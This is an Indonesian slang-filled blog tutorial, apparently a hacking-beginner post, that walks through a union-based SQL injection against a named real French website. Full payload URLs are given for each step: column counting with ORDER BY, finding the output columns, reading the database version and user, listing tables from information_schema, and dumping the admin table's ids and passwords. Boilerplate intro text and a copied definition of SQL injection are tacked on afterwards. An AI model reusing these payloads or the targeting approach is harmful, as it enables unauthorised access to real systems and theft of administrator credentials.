Wokey dah,,

1. Siapkan site yang vurln

nyari site yang vurln ne bs dengan pake tools atau dengan manual, yaitu menambahkan character petik satu di akhir url,,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=90′

site itu dianggap vurln jika stelah dikasih petik satu, site tersebut menampilkan pesan error.

Klo di site yang vurln biasanya muncul pesan error SQL, tapi di site yg kali ini sedang kita coba cuma muncul “erreur select” (kyaknya udah di patch ma adminnya, tp ga tau lah koq bs di inject), buat meyakinkan lagi, qt lanjut ajjah  deh ke next step…

2. memeriksa jumlah column yang ada dalam halaman yg vurln itu(gag tau lah istilahnya apa, liat aj deh caranya)

jd pkoknya kita thu ngecek jumlah kolom yang ada di site itu dengan perintah “+ORDER+BY+jumlah kolom perkiraan”.

pertama-tama gw pake perkiraan 5 ye,,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=90+order+by+5–

jika page tersebut muncul tanpa pesan error, artinya jumlah kolom yang kita inputkan jumlahnya <=jumlah kolom pada page tersebut.

selanjutnya kita coba dengan perkiraan 10 (aslinye ni terserah lo guys pake perkiraan brapa..)

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=90+order+by+10–

jrengggg, muncul pesan error thhu…hayo napa hayo??

temen gw yang nnton aksi gw : “coolkidz, lo apain huh? koq bs gtuh???”

coolkidz : sambil siulan and tetep cool bilang, “rahasia…lo liat aj ntar pnjelasannya di blog gw”.

tapi klo lo yang tanya guys, gw ksh tw,, ithu thu ye bcoz of jumlah perkiraan kolom yang kita masukkan melebihi jumlah kolom sebenernye…klo di site ntu pan munculnya lagi2 “erreur select” tapi pada umumnya ntu munculnya ” Unknown column ‘jumlah kolom perkiraan yang salah’ in ‘order clause’ “, gtuh…ok??qt coba kurangin klo gtuh,,10 kurangin 1 jadi 8 9,,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=90+order+by+9–

jrengggg, muncul thu sitenya…

kesimpulan : klo tadi dengan angka 10 udah error trus coba 9 lha koq muncul,, kesimpulannya…jumlah kolom di page ntu 9 chuyyy…trust me deh…ga prcaya??nyok liat ke step berikutnya….

3. memunculkan lokasi kolom

ne maksudnya buat munculin lokasi kolom yang ada di page thu, yang nantinya akan kita pakai buat munculin username n passwordnya…caranya thu dengan menjabarkan value2 kolom td…misal td kan jumlah kolom yg kita dpet 9..jadi kita jabarkan sperti 1,2,3,4,5,6,7,8,9.

guest : maksudnya???

gw : bingung??msh bingung??gag mudeng??

idih wow, ywd deh langsung ke TKP aj. Jangan banyak teori…Talk Less do More,,cabut chuy…

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9–

guest : what???apaan nih??apa maksudnya??tetep aj thu tampilannya..gag ngefect…gag mutu lo coolkidz…palsu lo!!!

coolkidz : sambil siulan n tetep cool bilang,”santai2,, just slow down baby….”.

coba deh kita tambahin tanda dash, alias minus atw klo msh gag ngerti yg ni neh simbolnya - di sebelum angka 5 (http://www.ch-rodez.fr/article.php?id=-5&srub=8&idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9–) , muncul gag? klo msh belum lo hapus dash td n cuba taruh dashnya di sebelum angka 8 (http://www.ch-rodez.fr/article.php?id=5&srub=-8&idarticle=90+union+all+select+1,2,3,4,5,6,7,8,9– ), masih blom??? trakhir neh,, taruh di sebelum angka 90 (http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=-90+union+all+select+1,2,3,4,5,6,7,8,9–).akhirnya,,

what???punya lo lom bs??lo matiin aj kompi lo. bawa ke toko kompi, lo jual!!! wkwkwkw, ad2 aj… coba tliti lg deh bung..waktu g nulis neh artikel msh bs kq, klo mank gag bs banget hubungin gw deh,, biar gw apus neh artikel..ok?? next step>>

4. memasukkan script untuk melihat versi db atw user db atw nama db

stelah lo nglakuin step ke-3 td pan hasilnya muncul page kosong n ada angkanya doank ye?

ya kgag??ha?? nggak?? lo blum bruntung kaliii, yg brhasil lanjut ye ma gw..

hasil step 3

dari gambar di atas kita tarik deh kesimpulan, bahwasannya kolom yang bs kita gunakan sbagai output ntar noh kolom 3,4,5 and 7. kembali ke topik step 4 (memasukkan script untuk melihat versi db atw user db atw nama db) kita langsung aj nginject dengan script sperti,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=-90+union+all+select+1,2,database(),version(),user(),6,7,8,9–

Kesimpulannya :  untuk menampilkan user db kita menggunakan user(), nama database kita gunakan database(), sedangkan versi db kita gunakan version(),,dan itu di tuliskan di kolom yg td tampil, dalam artikel ne si coolkidz pake kolom 4 and 5, lo bs pake kolom lainnya klo mw,tp cuma bs kolom2 yg td muncul, yaitu kolom 3,4,5 or 7.ok?? next step>>

5. menampilkan daftar tabel yang ada pada database

disini neh kita bru mulai blajar nakal dikit,,blajar ngintip…woy jangan horny dulu…ne bukan ngintipin cewek bugil, mandi atw ap…ngeres ja otak lo!!okehhh, kita ngintipin databasenya orang nyokkk…caranya tetep dengan nginject-in script ke dalam db nya ntu site,,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(table_name),8,9+from+information_schema.tables+where+table_schema=database()–

hasil step 4

coolkidz : sambil siulan bilang,”gimana??langsung mata lo tertuju ke tabel adminnya ja..jangan kmana2!!!”

guest : “bntar bang, ntu kq bs gtuh seh??jelasin dulu donk!!! jangan ngacir gtuh aje..”, sambil marah2..

coolkidz : wokey, gw jelasin

1. group_concat(table_name) ==> gw tulis di bagian kolom no.7, sesuai dengan syntax nya, thu fungsinya buat nampilin nama tabel secara group klo gag pake group_concat().
2. from+information_schema.tables ==> kolom yang kita ambil datanya di database information schema
3. where+table_schema=database() ==> kondisi untuk menampilkan tabel2 yang mana dia berada di baris yang kolom table_schema nya berisikan nama database yang kita inginkan data tabelnya.
4. – tanda itu biasa ada di akhir inject lom tau fungsinya apaan jadi sorry gag gw jelasin. maklum neh gw ne ank baru di dunia gnian..

next step>>

6. Mengambil data kolom dari tabel yang telah kita temukan

wokey,, now qt akan mengintip lebih dalam lagi ke dalam tabel itu…sasarannya yaitu,,nama kolom…seppp, buat dapetin data dalam tabel ntu kita harus tau dulu nama2 kolom dalam tabel itu yang nantinya akan kita ambil datanya.ok bro??

next >> qt langsung inject aj lg buat ngambil data kolom dr tabel yang kita incar sejak awal ==> tabel “admin”.

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(column_name),8,9+from+information_schema.columns+where+table_name=0x61646d696e–

jrengggg,

hasil step 6

sepp, dapat khan nama kolomnya?? next on>> sorry neh klo cpet2 gw buru2 mo meeting ke batu..klo lo ad pertanyaan japri gw di ym coolkidz1412@ymail.com atw ksh comment diartikel ni aj…

7. Mengambil data dr kolom yang sudah di temukan

it’s the show time…

lo ikutin link ni aj deh,,

example : http://www.ch-rodez.fr/article.php?id=5&srub=8&idarticle=-90+union+all+select+1,2,3,version(),user(),6,group_concat(concat_ws(0x3a,id,motdepasse,enligne)),8,9+from+admin–

hasil step 7

temen gw yg nnton : idih wow,, kq bs gtuh coolkidz??

coolkidz : sambil siulan n packing barang2,”kapan2 deh gw jelasin,, gw mo brangkat ke batu..”

“guys, gw cuma bs smpe sini aj…untuk step yg lom gw jelasin tp lo msh juga lom mudeng/jelas/paham lo japri gw ke coolkidz1412@ymail.com atw ksh comment di artikel ni aj yawh,,dah dulu yow,, C u on next articles…”

pertama-tama alias the first…

I’ll terangin ke loe ttg pengertian SQL injection dulu,,(ibarat bayi lahir gag mungkin langsung jalan khan??bagi newbie2=>termasuk gw,, psen gw cuma satu,, di dunia ni gag da yg instan,, smuanya btuh proses,, so baca dulu pengertian dasarnya ttg SQL injection yg bkal g jelasin stelah kalimat ini).

SQL injction (Injeksi SQL) adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.

Gimana?? dah dapet gambaran lom??

Masih gag jelas yeh??Sorry, thu td CoPas dr wiki,,^_^

Gni neh intinye…

SQLi thu teknik nyelipin script query SQL dengan memanfaatkan celah keamanan pada database yg di pakai suatu site dan kelemahan(vurln) pada suatu site,celah ni bisa ada thu di sebabkan oleh si pembuat site yang kurang teliti noh ngefilter inputan2 pada form maupun url sitenya,,

okey, cuma thu deh yang bs gw jelasin about SQLi,,

next>> Gw kan jelasin langkah2 SQLi yang sumbernya berdasarkan pengalaman gw,,

Tp gw jelasinnya di artikel stelah niy,,

ok??!!

(Klo “OK” udahan donk baca yang ni!! Pergi sno ke next artikel yg judulnya “SQLi part 1″)

Di site ini anda dapat mendapatkan info-info terbaru mengenai dunia IT, Musik, Basket dan lain – lain apa aj yang skiranya bisa gua posting,hwehwhe..

Skian gtuh aj deh intronya,
Males nulis kata sambutan, maklum deh…Bhasa Indo gw jeblok..wkwkwkwkw…

Udah skian ye intronya,

C u next on my articles…Don’t forget to give my article comments..

Thank u,

Best Regards,

miracle_04